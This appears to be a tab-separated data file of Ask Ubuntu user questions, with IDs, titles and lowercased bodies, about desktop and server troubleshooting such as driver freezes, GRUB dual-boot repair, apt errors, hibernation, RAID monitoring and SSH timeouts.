209804	update manager stop working	i 'm using ubuntu 12.10 i386 . after trying to install skype , the update manager crashes . i tried to use the console using the commands sudo apt-get update and sudo apt-get update -f and always the same . error 404 with this message '' w : falhou obter http : //archive.canonical.com/commercial-ppa-uploaders/skype/ubuntu/dists/quantal/main/binary-i386/packages 404 not found [ ip : 91.189.92.150 80 ] '' . already tried some of your solutions and already verified ppa . ca n't find the problem . update manager still does n't work .
209810	emachines e725 display very light	after hard installation of ubuntu 12.04 alongside windows 8 the display light is very high . how can i reduce it . i used fn+right or left arrow but nothing changed . i am new in ubuntu .
209812	12.10 does not boot sometimes from the hard drive , but it does consistently from the cd	i have recently switched from windows 7 to ubuntu 12.10 . i have installed ubuntu 12.10 and i cleared everything from my computer , but it randomly stops at different screens . only a purple screen comes up . i can choose ubuntu from a list and a blinking white dot appears in the top left corner . the previous things happen and the ubuntu login screen appears an i can log in . it is random . and i have not changed anything . i can always insert the bootable cd and it will work every time .
209819	switch between apps with keyboard only ( not alt+tab or super+ < number > )	i 'm looking for a way to switch between apps with the keyboard only and not limited to some applications by defining shortcuts . gnome3 offers the possibility to switch to ( or start ) an application by typing the app name . kde allows this with krunner . the application lens in unity does not offer this at all : https : //bugs.launchpad.net/ayatana-design/+bug/1027792 is there now way to master this very basic and handy functionality with unity ?
209829	my windows 7 is getting the `` an error occurred . press control+alt+del '' message on boot	so i upgraded my ubuntu to 12.10 but the windows 7 problem seems to have happened not after doing the upgrade but later . i am not sure . ubuntu is running fine , but how can i recover my windows7 ? i tried running bootrepair in ubuntu but it keeps scanning system endlessly ... if i recover windows with the windows dvd i assume i will lose the grub menu and then not possible to start ubuntu . how do i then proceed to recover the grub ? can i recover using the ubuntu dvd ?
209831	ubuntu upgrade tool	when i try to upgrade to 12.10 i get the standard screen offering the upgrade , then the welcome to ubuntu 12.10 quantal quetzal screen then when i accept that two files are loaded called the ubuntu upgrade tool then no further action . why wo n't the full upgrade initiate ? note the pc has been fully updated in 12.04 and restarted .
209837	is there any way to facilitate switching windows in ubuntu ?	i 'm just a student who received my laptop from my uncle , who 's a coder , so i 'm still getting used to working with ubuntu . i recently upgraded ubuntu from an earlier version , and everything seems to be pretty great . the only thing is that when i open a program , or file , or whatever , it takes up the whole screen . i can only close it by going to the far top left of my screen , or by ctrl+w . anyways , i find it really hard to switch between programs . for example i really like to have my windows that are open to be accessible by clicking on their icon at the bottom of the screen ... great when writing or researching . anyways , i really just want to find an easier way to switch windows . also , i used to love the way i could cube-rotate my screen , and just drag files from one desktop to another , with compiz . now , its sort of like flipping a coin when i switch windows , is there any way to get my desktop cube back ? and yes , i have enabled all the old settings i used to use with compiz . sorry if what i 'm asking is very basic , i know how to use a computer , i 'm just not really familiar with the interface ! any help is greatly appreciated .
209839	dual boot fedora with ubuntu	i have a laptop currently running fedora , how can i dual boot it with ubuntu ?
209841	how to watch a video on every workspace ?	i was wondering if there was an application or something that would allow me to view a workspace in the corner of another workspace ? for example if i had a video playing on one workspace , i 'd be able to view it in another workspace while working on something . i know it 's quite a strange idea , but i think that would be quite a cool addition . i 'm a programmer but i 've never made anything for ubuntu so i 'm not quite sure how to code something like this , so any ideas or suggestions would be very much appreciated .
209844	latest ec2 ubuntu instance seems broken	i am using ec2 ubuntu instances now for some time and never had a problem with . today i created a new ubuntu 12.04 lts precise ebs boot on us-east-1 , seems to be a bad build . while doing a sudo apt-get update it breaks and says : w : failed to fetch bzip2 : /var/lib/apt/lists/partial/us-east-1.ec2.archive.ubuntu.com_ubuntu_dists_precise-updates_main_source_sources hash sum mismatch this is on a fresh instance . so i reckon something went wrong when creating it . what can be done to fix it ?
209845	gui is not displayed anymore	i am running 12.04 lts on a vm . i encountered a problem with the screen being black and the familiar orange background showing for a fraction of a second when clicking or resizing the screen . i had to shutdown the machine and now i have no gui . i only get a black command-line interface . as some other posts suggest , i attempted : sudo service lightdm restart this does n't work for me because it gets stuck at this point : skipping profile in /etc/apparmor.d/disable : user.bin.firefox skipping profile in /etc/apparmor.d/disable : user.sbin.rsyslogd * starting apparmor profiles [ ok ] any ideas ? edit : /var/log/lightdm/lightdm.log : [ +0.00s ] debug : logging to /var/log/lightdm/lightdm.log [ +0.00s ] debug : starting light display manager 1.2.1 , uid=0 pid=933 [ +0.00s ] debug : loaded configuration from /etc/lightdm/lightdm.conf [ +0.00s ] debug : using d-bus name org.freedesktop.displaymanager [ +0.00s ] debug : registered seat module xlocal [ +0.00s ] debug : registered seat module xremote [ +0.00s ] debug : adding default seat [ +0.00s ] debug : starting seat [ +0.00s ] debug : starting new display for greeter [ +0.00s ] debug : starting local x display [ +0.35s ] debug : x server :0 will replace plymouth [ +0.44s ] debug : using vt 7 [ +0.44s ] debug : activating vt 7 [ +0.44s ] debug : logging to /var/log/lightdm/x-0.log [ +0.64s ] debug : writing x server authority to /var/run/lightdm/root/:0 [ +0.64s ] debug : launching x server [ +0.65s ] debug : launching process 960 : /usr/bin/x :0 -auth /var/run/lightdm/root/:0 -nolisten tcp vt7 -novtswitch -background none [ +0.66s ] debug : waiting for ready signal from x server :0 [ +0.66s ] debug : acquired bus name org.freedesktop.displaymanager [ +0.66s ] debug : registering seat with bus path /org/freedesktop/displaymanager/seat0 [ +0.70s ] debug : process 960 exited with return value 127 [ +0.70s ] debug : x server stopped [ +0.70s ] debug : removing x server authority /var/run/lightdm/root/:0 [ +0.70s ] debug : releasing vt 7 [ +0.70s ] debug : stopping plymouth , x server failed to start [ +1.34s ] debug : display server stopped [ +1.34s ] debug : stopping display [ +1.34s ] debug : display stopped [ +1.34s ] debug : stopping x local seat , failed to start a display [ +1.34s ] debug : stopping seat [ +1.34s ] debug : seat stopped [ +1.34s ] debug : required seat has stopped [ +1.34s ] debug : stopping display manager [ +1.34s ] debug : display manager stopped [ +1.34s ] debug : stopping daemon [ +1.35s ] debug : exiting with return value 1 x-0-greeter.log x-0.log
209848	connect lenovo w520 with tv using vga output	i am trying to connect my lenovo thinkpad w520 with my 32 inch tv ( samsung ) using he vga output.the problem is that after connecting it with the tv i go to system settings and then monitors but it does n't show up there.i rebooted my system and again nothing happened.so i tried to change my default video card in the bios and i chose to boot with intel 's card only.again though nothing happened.i did n't tried with my nvidia video card because last time i did that ubuntu was completely destroyed after saving the configuration file through the nvidia 's x server control panel.my laptop has nvidia optimus technology , but i can choose from the bios which video card i want to use.after running : lspci | grep vga in terminal the results are : 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) ( it shows only the intel 's video card because curently i have chose to boot using only intel 's video card.if i chose from the bios that i want to use the nvidia optimus technology and the option to let the system whether or not the optimus technology is supported then both cards will show up in terminal after running lspci | grep vga . )
209853	how to automount usb drive reliably without fstab	i need a way to mount a usb drive without using fstab . i can not use fstab because the drive is not connected to my computer at boot . this causes an issue during any one off reboots because start up hang waiting for this device until a keyboard intervention to skip it . i can not use my current script with just does mount /dev/sde1 /media/backup because sometimes it changes to sdf . consider this a server install . i ca n't use tools at the user or gui level . i suppose the sum of my question is how to manually mount a usb drive from the commandline considering the reliability of the /dev/sd value is n't consistent .
209856	cron script to detect degraded raid array ?	to my surprise , my raid array entered degraded mode some time ago . how can i set up a cron job to warn me ? i 've tried from the mdadm man page : running mdadm -- monitor -- scan -1 from a cron script will ensure regular notification of any degraded arrays . but on my array this does nothing , despite the problem : # cat /sys/block/md0/md/degraded 1 # cat /proc/mdstat personalities : [ linear ] [ multipath ] [ raid0 ] [ raid1 ] [ raid6 ] [ raid5 ] [ raid4 ] [ raid10 ] md0 : active raid1 sdc1 [ 0 ] 976759672 blocks super 1.2 [ 2/1 ] [ u_ ] see also : app indicator for software raid running degraded ?
209858	change root user 's home directory in ubuntu ?	title says it all , how do i change the home directory of the 'root ' user in ubuntu 12.04 ?
209866	xubuntu display layout is not saved	i have a laptop running xubunu 12.10 with an hdmi display attached . when i log off or reboot , and then log back in , i need to reapply my display arrangements in arandr when i log back in ( oddly , the resolutions are maintained , but not the placement ) . my display arrangements also break when an hdmi switch is used . what can i do to fix this ?
209867	undelete inode of deleted files	i accidentally deleted my documents folder in my home directory last sunday . i am desperately trying to recorver it with it content files . after digging around , i came across a suggestion to use scalpel to help the recorvery , i have tried it , but because i dont have enough space on my hard disk , it fails carving . i have decided today to use ｀debugfs｀ , and again have managed to screw up even more . what happened is - i executed ; `` 1. lsdel to view all deleted files inodes , '' `` 2. help to see all possible commands . '' i saw ｀undel｀ which i immediately assumed meant undelete the inode to restore the files so i performed undel on all without jotting them down . question does this means i now ca n't recorver my files ? if that is not the case ; is there a way to recorver the files without using the inodes , or perhaps restore debufs inode history back to where it was previously ? !
209870	quantal analyzes the hd in any boot	i have installed ubuntu 12.10 formating the hdd . any time that i turn on the pc and boot ubuntu , it always analyzes my hdd in search for bad blocks . this is what happens : when i turn on the pc and load ubuntu , before i can login my user , appears the following image . if i press c , the process ends and i can work , if i wait until the process can finish by itself also i can work . also i had this problem , related to the hdd . my hard disk driver is a western digital . is there any problem on the system ? can i stop this procedure ? information that can help : tune2fs -l output
209871	error -12 hibernation image . not enough free memory ( sometimes )	i am having a problem with hibernation in ubuntu 12.10 , it had worked fine in 12.04 . when i try and hibernate it sometimes appears to hibernate throws up an error and returns me to the desktop . the error i get is this : pm : creating hibernation image : pm : need to copy 375021 pages pm : normal pages needed : 117957 + 1024 , available pages : 110205 pm : not enough free memory pm : error -12 creating hibernation image now i understand what the error means , but it does n't make sense . my swap file is 5gb and is seldom ever used as i have 4gb of ram . i know it is recommended to have 1.5 times more swap than ram etc , but space does n't seem to be the problem , despite the error . for example , i rarely use more than about 25 % -30 % of my ram , yet still have the problem above . moreover on a fresh boot and login , with no programs open and using only about 12 % of ram , i can get the above error - yet at other times i can hibernate whilst using 25 % of my ram . also if i keep trying to hibernate , it eventually does after throwing up the above error four or five times . a successful hibernation looks like this : pm : creating hibernation image : pm : need to copy 295511 pages pm : normal pages needed : 95534 + 1024 , available pages : 132627 is there some setting that i need to tweak or something i need to do before hibernating to avoid this problem ? i guess the question could be better interpreted as : is there some way of safely flushing the buffers and the cache before hibernation ? other than attempting to hibernate several times until it is successful ! thanks in advance .
209872	lenovo u410 -- messed up grub/mrb , and ca n't access bios	i am out of ideas , so i thought i would ask here . i have a lenovo u410 and it comes with one of those intel hybrid hdd 's that has a 32gb ssd in it . i figured i would unraid it and try out ubuntu on it for the first time . i got it installed and working , but when i tried to get back into windows , i got an error about efi table ( i think that 's what is was , i am on my phone on the bus ) . after that , i tried to repair the mbr as i decided i did n't want to run it on my laptop . i ca n't get windows back , and i ca n't even access the bios to try and repair windows . everything i try and do seems to break things even farther now and i have no idea what i can do . booting goes straight to grub and i ca n't access bios . i have tried using boot repair to fix mrb but i think i made it worse i have tried a bunch of other things that just seem to make it worse . can anyone help me please ! !
209873	my laptop shuts down after suspend	my ubuntu shuts down after suspend . does anyone has any idea ? thanks a lot ubuntu 12.04 ,
209876	upgraded ubuntu from 12.04 to 12.10 ati radeon hd 3450 catastrophe !	when i had upgraded everything was ready on the screen om my computer and with my 12.04 ubuntu . when i restarted my system , the graphics card was not detected . i was forced to start the computer in low graphics mode , and eventually i had a pink deskop with only my maps , and no other programs at all . what do i do now ? i need to recover the pictures on my system so that i can upload them online . i 'd done a graphics card test on the terminal initially , and it showed that the card was compatible with unity 3d . i have an ati radeon hd 3450 and i was running a 32 bit build of ubuntu 12.04 initially right now i have a broken install of linux , with no working graphics card or desktop to start from , so i 'm unsure of how to fix this .
209878	how to upgrade from 11.10 to 12.04 lts without update manager ?	i am running 11.10 on my pc . the update manager once indicated that i could upgrade to 12.04 lts . however , clicking the upgrade button made the update manager unresponsive and i had to force quit the app . the next time i started the app , it showed me all the updates except for 12.04 . is there anyway i can upgrade to 12.04 ? ?
209881	can i safely sync .config/ between computers ?	i have a netbook and desktop which i 'd like to share application configuration between through dropbox . currently my netbook is set to symlink ~/.config - > ~/dropbox/.config which it 's working fine . i 'm about to add this setup to my desktop but thought i 'd ask about it first . is it safe to sync ~/.config/ between computers ?
209883	how do i set the transparency of say the firefox window title in ubuntu 12.10 ?	how would i go about setting the transparency of the window bar of each window in ubuntu 12.10 . i have tried using compiz config , any ideas ? apologies for noobism .
209886	snd-hda-intel and the hp envy 17	so i know that other people have had issues with audio on envy series notebooks . however there 's very little out there in terms of the hp envy 17-3200 ( 4 speakers and a woofer ) . in light of this , i 've had considerable trouble getting sound to work right . but more than that , i do n't even know if sound can work right with current kernel modules or if someone somewhere will have to do some coding . the card is given by : $ cat /proc/asound/card0/codec # 0 | grep codec codec : idt 92hd91bxx now , this card does not appear in the list of compatible cards . however , all functionality can be achieved using a combination of different supported cards ( and this is where it gets weird ) . two of the four tweeters work out of the box , but a series of kernel errors are sent from snd-usb-audio , which tries to control the subwoofer . blacklisting snd-usb-audio and setting the model of snd-hda-intel to 'ref ' allows the internal speakers ( including the subwoofer ) to work . however , it is impossible to mute the internal speakers without also muting headphones . if the model is set to any reasonable value other than 'ref ' ( including 'auto ' ) , then the internal speakers will mute correctly when headphones are plugged in , but the subwoofer will not work . i can run a script to switch the model at run time every time i plug in headphones , but this requires superuser privileges and is something i just should n't have to do . i have submitted a bug report to kernel.org , but am increasingly unsure over whether that was right to do so . this problem also exists under arch and fedora . thoughts ?
209891	ubuntu 12.04 / 12.10 randomly freezing - nvidia ?	my ubuntu install frequently freezes , sometimes showing a black screen ( not very common anymore - in my latest installs ) , some other times the mouse and keyboard just fail to move and respond ( not even ctrl + alt + f1 works ) and some other times i 'm able to move the mouse with a huge delay ( 2-5 seconds ) but i 'm not able to do/click anything . i have a pretty strong feeling that this problem is related to my graphic card drivers because : after hard reset , i usually get error reports about x.org / jockey it 's common for artifacts to appear during loading / shutdown / whenever , for instance : pattern filled with âł during log off ugly-colored squared pattern during boot windows that are partially moved ( i.e . : only the top half ) firefox renderings that leave the bottom ~30 % of the page black these artifacts appear right before the system freezes . i 've installed ubuntu 12.04 lts and after several failed attempts to get my dual monitor setup to work properly i tried installing the new 12.10 version , hoping that this new version would have this problem solved ... unfortunatly , that was not the case , so i reverted to ubuntu 12.04 . i 've tried all the drivers in the additional drivers application ( even the experimental ones ) , i 've also tried the nvidia-current package from the ppa repository ubuntu-x-swat/x-updates as well as the nouveau oss driver . nothing ( except no driver at all with a 640*480 resolution ) at all seems stable . here is the info of my graphic card : alix @ alix-e500 : ~ $ lspci | grep vga 01:00.0 vga compatible controller : nvidia corporation g86 [ geforce 8400m g ] ( rev a1 ) alix @ alix-e500 : ~ $ sudo lshw -c video [ sudo ] password for alix : *-display description : vga compatible controller product : g86 [ geforce 8400m g ] vendor : nvidia corporation physical id : 0 bus info : pci @ 0000:01:00.0 version : a1 width : 64 bits clock : 33mhz capabilities : pm msi pciexpress vga_controller bus_master cap_list rom configuration : driver=nouveau latency=0 resources : irq:16 memory : fd000000-fdffffff memory : d0000000-dfffffff memory : fa000000-fbffffff ioport : cc00 ( size=128 ) memory : fe0e0000-fe0fffff right now , i do n't even have my 22 '' monitor connected as i ca n't even get my laptop display to work properly and without freezes . i 've searched , read and tried all that i could ( over several fresh reinstalls ) to fix the problem , but so far , no solution has proven definitive . i 'm sorry i ca n't precise which symptom maps to each driver but i 've been trying to solve this one on my own without logging what i 'm doing , perhaps someone here will be able to point me to a certain-fix solution , if not i 'll keep updating this question as i go along . please let me know if any more info is needed to pinpoint the exact problem . trying out nvidia accelerated graphics driver ( version 173 ) . the scrolling , minimizing / maximizing windows takes between 2 and 5 seconds to finalize . context menus also pop up very slowly and the typing seems delayed by ~1 second . no critical issues so far . firefox rendering of the save edits button is consistently messed up ( random black lines in the top ) . trying out nvidia accelerated graphics driver ( version current ) [ recommended ] . all the delays mentioned above and the buggy rendering of the save edits button are gone , but i 'm noticing that the whole screen flashes black for a couple of microseconds and while i was writing this test for the first time , the bottom 30 % of the screen went black and i could n't do anything ( not even ctrl + alt + f1 would work ) . had to force a hard reset . also , the system hanged a little for a couple of seconds with the fade out of the `` restart '' menu . trying out nvidia accelerated graphics driver ( *experimental*beta ) ( version experimental-304 ) . same symptoms as before , it crashed once while i was trying to install chromium and again after a hard reset when i was trying to remove the driver . the bottom of the screen did not went black and i could move my mouse both times . ctrl + alt + f1 did n't work . the ugly-colored pattern also showed up during the second boot . trying out nvidia accelerated graphics driver ( *experimental*beta ) ( version experimental-307 ) . the system crashed as soon as i clicked something . had to do a fresh re-install . trying out nouveau : accelerated open source driver for nvidia cards . artifacts still show up during boot but other than that this one seems stable . as soon as i connected my second monitor , the responsiveness dropped a lot , animations and video are somewhat slow . i 'm gon na try this solution http : //askubuntu.com/a/98871/9018 later on . i tried the above solution , the first command returned that the -- uninstall argument was not implemented but other than that everything went okay . i rebooted my system and after the login the monitor went black for a couple of seconds and then instead of the unity interface i just saw artifacts in their place . i could tell the mouse and keyboard worked so i did ctrl + alt + f1 and typed : sudo service lightdm restart then the same thing happened again . i rebooted my system once again and this time i could n't pass the black phase , keyboard did n't worked so i restarted again . this last time , after login , the screen just showed my background image tiled and nothing more for several minutes . i 'm considering moving back to windows at this point .
209908	firefox and ipvv6	i read that disabling ipv6 speeds up browsing and is recommended from a security perspective . is this true ? if i disable it , how many sites will i not be able to access ? according the mozillazine , firefox first tries ipv6 and if that fails , tries ipv4 . will disabling ipv6 reverse the preference , or disable it entirely ?
209913	how to make a program autostart at every login on 12.10 ?	how make a program autostart et every login . i see this link but not for 12.10 how do i make a program auto-start everytime i log in ?
209919	how to use grub as default bootloader while dual booting win7+ubuntu	i installed windows 7 first and then ubuntu , booted back into windows and used easybcd to use the windows 7 bootloader for dual booting . so when the system is rebooted windows bootloader comes up first and once you select ubuntu then grub shows up . i need to how to make grub the default bootloader instead of windows 7 's . thank you
209924	how to rename a batch of files with an incrementing number in the file name ?	i want to rename batch of files named example1.java , example2.java to q1.java , q2.java at once . is this possible ?
209928	evolution email forgets all settings after reboot	my evolution email client keeps forgetting all settings after a reboot or even a logout/login . i have recently installed ubuntu 12.04 on a new laptop . to move my evolution settings and email over to the new machine , i selected `` backup '' , which creates a single tar.gz archive of all evolution settings and mail . i copied the file to the new computer , started evolution which presented me with the startup assistant . i selected 'restore from backup ' , pointed at the tar.gz file and all was beautifully restored . all seemed to work just fine . however , after a reboot i noticed that evolution seems to have forgotten all settings : i get the startup assistant again when i start evolution . i checked that the .conf/evolution and .local/share/evolution directories were still present , yet , none of that seemed to matter , it wanted me to restore from a backup again . the version of ubuntu ( 12.04 ) and evolution ( 3.2.3 ) are the same on the old and new laptop . just stopping and restarting evolution does not cause this problem . even if i manually kill all evolution related processes , the settings will be remembered and it can start up no problem . the problem only happens on logout/login or reboot .
209931	ssh connection time out	whenever i try to ssh my vps account it says : ssh connection time out during banner exchange . i want to know the reason behind this problem and a solution . my vps is running ubuntu 12.04 server and i am trying to connect from a ubuntu 12.10 client . i am using key based authentication and ssh version is 2 .
209932	can not get past `` installation type '' screen after choosing `` install ubuntu inside windows 7 ''	after getting to the screen that states : `` this computer currently has windows 7 on it . what would you like to do ? '' i am not able to continue with the installation process after selecting `` install ubuntu inside windows 7 '' . i am running ubuntu off a usb drive after using unetbootin and then selecting the `` install ubuntu 12.04 lts '' shortcut . everything included on the online guides worked perfectly up to this point . very new to linux , please help ?
209934	why do df and du show different output ?	when i execute the command df -h /tmp it says disk utilization is 100 % , but when it try du -sh /tmp it says disk utilization is 2 % . i want to know why these commands shows different output , how these two commands work and what is the solution to this problem . context : /tmp is installed on it own file system . i am using ubuntu 12.04 server edition on my vps account . due to this problem utilization of /tmp 100 % according to df some programs complain about free space in /tmp .
209936	ubuntu 12.10 no sound through nvidia hdmi	i installed the nvidia-current-updates driver , and then the sound through hdmi stopped so i am getting no sound for ubuntu 64 bit , i have gtx 560 graphics card asrock motherboard pro4 gtx560 graphics card connected mini hdmi to hdmi
209939	problems booting ubuntu 10.10 with nvdia geforce 6600gt	i am quite new to ubuntu and i already stumbled upon a problem . i run ubuntu 10.10 maverick meerkat now and install went fine , when trying to boot the screen popped black and i faced this message `` gpu lockup - switching to software fbcon . '' when setting the display to onboard vga through bios ubuntu has no problem at all , but when i switch back to my agp card ( which is a nvidia geforce 6600gt ) i get that message again . i do not use vga for that card i use my dvi cable for it . does anyone have an answer for me to make this work ? thank you
209941	ca n't install wine1.5 . need help	i ca n't seem to be able to install wine.. i get the unmet dependencies depends : ( wine1.5-i386 ) this is the only program i 've not managed to get working ; / also the desktop cube , but i read somewhere that is not functional thesedays .
209943	virt-manager in php	can anybody help me to display details about the vm using php code . am using ubuntu server and used kvm as hypervisor . am trying to display cores , ram , memory alloted each vm . i have tried all the shell commands in php using shell_exec and exec . without installing any tool .
209944	launcher not diplaying ubuntu 12.04lts	missing menu and launcher ca n't get any applications as launcher and menu are missing happened after downloading updates
209950	integrated webcam can not be used in virtualbox guest xp	i have windows xp installed in my virtualbox . the integrated webcam is working fine in ubuntu but windows xp ca n't recognize it ( ca n't find the webcam in device manager , and it does n't ask for driver installation either ) . my computer is lenovo t410 and i have installed guest additions . what should i do now ? thank you . update1 : it works when i run virtualbox with root privileges , but this does n't seem to be a good solution .
209952	ubuntu 12.04 , why service procps start does n't start procps ?	i have been trying to get some settings in /etc/sysctl.conf to take effect upon rebooting . so , i did the following as the root user on this node running ubuntu 12.04 lts 64bit # service procps status procps stop/waiting # service procps start procps stop/waiting no matter how i tried . the /etc/init/procps is stock as shown below . i have not touched it ( not familiar with upstart yet ) . # procps - set sysctls from /etc/sysctl.conf # # this task sets kernel sysctl variables from /etc/sysctl.conf and # /etc/sysctl.d description `` set sysctls from /etc/sysctl.conf '' instance $ upstart_events env upstart_events= start on virtual-filesystems or static-network-up task script cat /etc/sysctl.d/*.conf /etc/sysctl.conf | sysctl -e -p - end script i would appreciate it very much for any hints about how to start this upstart job . up to now , i always have to manually issue /sbin/sysctl -p /etc/sysctl.conf . it gets old really fast ... thanks , -- zack
209953	canno't open ubuntu software center and synaptic package manager	e : encountered a section with no package : header e : problem with mergelist /var/lib/apt/lists/archive.canonical.com_ubuntu_dists_quantal_partner_i18n_translation-en % 5fus e : the package lists or status file could not be parsed or opened . e : _cache- > open ( ) failed , please report . can anyone solve it ?
209958	how to avoid thunderbird exceeding email account bandwidth limit ?	since a fresh install of ubuntu 12.10 i get messages from thunderbird that my email account has exceeded bandwidth limits . i use imap access my email and i have never had this problem before but i notice that thunderbird never really finishes downloading messages . my bandwidth limit is 2.5 gb per day and thunderbird keeps hitting the limit between being suspended due to hitting it . how can i avoid reaching the bandwidth limit ?
209960	window controls not moving to right side in 12.10	i 'm using gnome classic , and i prefer my window controls to be on the right side . i 've followed the instructions in this answer , and in gconf-editor , i edited the value for apps/metacity/general/button_layout to be : minimize , maximize , close . this worked before in 12.04 . however , in a fresh install of 12.10 , it is no longer taking effect . the window controls are staying on the left side . how do i get the window controls to be on the right side ?
209961	how do i run the equivalent of 'mstsc ' from a ubuntu machine ?	how to run the equivalent of mstsc from a ubuntu machine ( i.e . do a remote login into a windows ec2 instance )
209963	can i use ubuntu font in my commercial software running on windows ce ?	i 'm now making commercial software for windows ce o/s , and i want to embed ubuntu font to my software . the file format will be converted to my own format to speed up my software . in this case , am i need to obtain some kind of license ? or do it freely with including license.txt files on my software ?
209966	non persistent keyboard shortcuts in unity	i did change the keyboard shortcuts for window navigation in unity to use hjkl ( vim movement ) . i did reassign the shortcuts via gui in system settings > keyboard > shortcuts . here are two examples of the assigned shortcuts : move window one workspace to the left = shift+ctrl+alt+h switch to workspace left = ctrl+alt+h occasionally , when restarting the maching , these shortcuts are being reset to theit default values : move window one workspace to the left = shift+ctrl+alt+left switch to workspace left = ctrl+alt+left how can i make these changes permanent ? can someone help me , narrowing down the problem ?
209970	problem with workspaces unity	when i am using a part of the workspace , what happens sometime is that a particular window open in one workspace has its one half in one workspace while the other in some adjacent workspace . this not only makes it very uncomfortable to work with as you have to open workspace switcher again and again to position the window . is there a solution to it ? am i doing something wrong ?
209973	ubuntu laptop connected to usb modem and set to be a hotspot + nexus 7	i 'm using my laptop as a wifi hotspot while it 's connected to broadband over a usb stick . and it works perfectly , i connect my phone to the laptop hotspot without a problem . but my nexus 7 ca n't find the hotspot , it 's just not detecting it . what settings should i change so it could work ? i 've been searching for days but i ca n't find the solution ...
209979	juju cache to different folder	i am writing a juju charm for a project and i would like to test and debug locally . i have a somewhat small ssd drive which i have my os installed on and my home folder on the larger non ssd drive . juju is caching a lot of stuff to the ssd drive and i would like to cache to the other drive . i tried using a symlink ln -s ~/juju/cache /var/cache/lxc but i still get an os warning after a while saying i am running out of disk space . could someone help me get juju to cache somewhere where it will not fill my ssd drive ?
209984	ca n't install nor try ubuntu 12.10 , system halted	tried to find a solution but i was n't able so far . i downloaded the torrent version of ubuntu 12.10 and burned it onto a dvd and created a bootable stick using unetbootin ... the thing is , when restarting my computer wo n't recognize the dvd ( the optical drive does read dvds ... ) and booting from cd works fine . trying to install it from the usb stick i get a black screen with a blue square labeled `` unetbootin '' and it seems like it wants to install , but i get `` uncompression error - system halted '' before it gets past the second text line . any suggestion ? my computer ran 12.04 just fine and i 'm using mint 11 as a temporary solution
209986	install lvm on ubuntu server	i want to setup an ubuntu server with lvm . i installed ubuntu using ubuntu-12.04.1-alternate-amd64.iso because i believe that the `` alternate '' disc must be used to install with lvm . however it created an ubuntu desktop for me . where did i go wrong ? should i use the server iso or is there someplace in the alternate iso where i can change a setting to not install the desktop ?
209993	how do i remove the twitter icon from indicator-messages ?	ubuntu 12.10 when i click envelope ( indicator-messages ) the icons for twitter , майл.ру , google+ and unity-mail are appears . 1 ) problem i need only unity-mail linked with my google-mail account , but i need n't google+ , twitter and майл.ру . it 's impossible to remove these icons from envelope . 2 ) i tried to remove twitter , google+ and майл.ру lens from os using synaptic packages manager . these packages are removed , but it appears on envelope , and is runs when i click on indicator-messages menu . ! ! ! please dont't propose to remove envelope . i do n't want to remove envelope , but only twitter , майл.ру , google+ icons from indicator-messages list .
209997	max 4 primary partitions .	i have a bit a problem , i shrinked my windows partition . but it seems i have another partition for recovery and for my documents . i do n't want to delete any of them . is there any way to move one of them , like the document partition together with the new ubuntu partition in just one extended partition ?
210005	how do i set the native resolution on an hp mini 210-1004sa ?	fyi : my netbook model is hp mini 210-1004sa , which comes with intel graphics media accelerator 3150 , and has a display 10.1 '' active matrix colour tft 1024 x 600 . i recently removed windows 7 starter from my netbook , and replaced it with ubuntu 12.10 . the problem is the os does n't seem to recognise the native display resolution of 1024x600 i.e . the bottom bits of ubuntu is hidden beneath the screen & the only 2 available resolutions are : the default 1024x768 and 800x600 . i 've also thought about replacing ubuntu with lubuntu or puppy linux , as the system does run a bit slow , but i ca n't , as then i wo n't be able to access the taskbar and application menu which will be hidden beneath the screen . only ubuntu with unity is currently usable , as the unity launcher is visible enough . i was able to define a custom resolution 1024x600 using the q & a : how set my monitor resolution ? but when i set that resolution , there appears a black band at the top of the screen and the desktop area is lowered , with bits of it hidden beneath the screen . i tried leaving it at this new resolution and restarting the system to see if the black band would disappear & the display will fit correctly , but it gets reset to 1024x768 at startup and displays following error : could not apply the stored configuration for monitors none of the selected modes were compatible with the possible modes : trying modes for crtc 63 crtc 63 : trying mode 800x600 @ 60hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 63 : trying mode 1024x768 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 63 : trying mode 800x600 @ 56hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 63 : trying mode 640x480 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) trying modes for crtc 64 crtc 64 : trying mode 1024x768 @ 60hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1024x600 @ 60hz ( pass 0 ) crtc 64 : trying mode 1024x768 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 64 : trying mode 800x600 @ 56hz with output at 1024x600 @ 60hz ( pass 1 ) crtc 64 : trying mode 640x480 @ 60hz with output at 1024x600 @ 60hz ( pass 1 ) update making progress ! i tried setting nomodeset , i915.modeset=1 , and i915.modeset=0 , respectively ; in grub . with nomodeset in grub , i can now see , and permanently set the 1024x600 resolution i created much earlier without any errors . however , the display is squished , and the bottom bit of the os is still hidden beneath the screen , & i think it has something to do with aspect ratio . i think it might have something to do with the fact that 1024x600 is the only mode with aspect ratio set to 16:9 . how do i change it to 4:3 so it fits ? though slightly insignificant , it is worth saying that with nomodeset enabled , the os graphics is a bit slower .
210012	what smart tvs will be compatible with ubuntu tv ?	as i want to buy a new smart tv/ pc monitor soon , what should i purchase - or what tech criteria does it need to have - that will allow me to update the firmware ( ? ) with ubuntu tv software when it becomes available ?
210014	how does juju expose work ?	if i expose my service , for instance teamspeak server , on what address it will be running ? on my server address ? for example : my server has an address of 158.37.15.167 . if i deploy teamspeak from my local network ( 10.0.0.0 ) connected to the server , how will it be seen in the 158.37.15.167 network ? when i run juju status i get this : public-address : nodetwo.localdomain instead of an ip address . my juju status : http : //pastebin.com/z99bhx9g
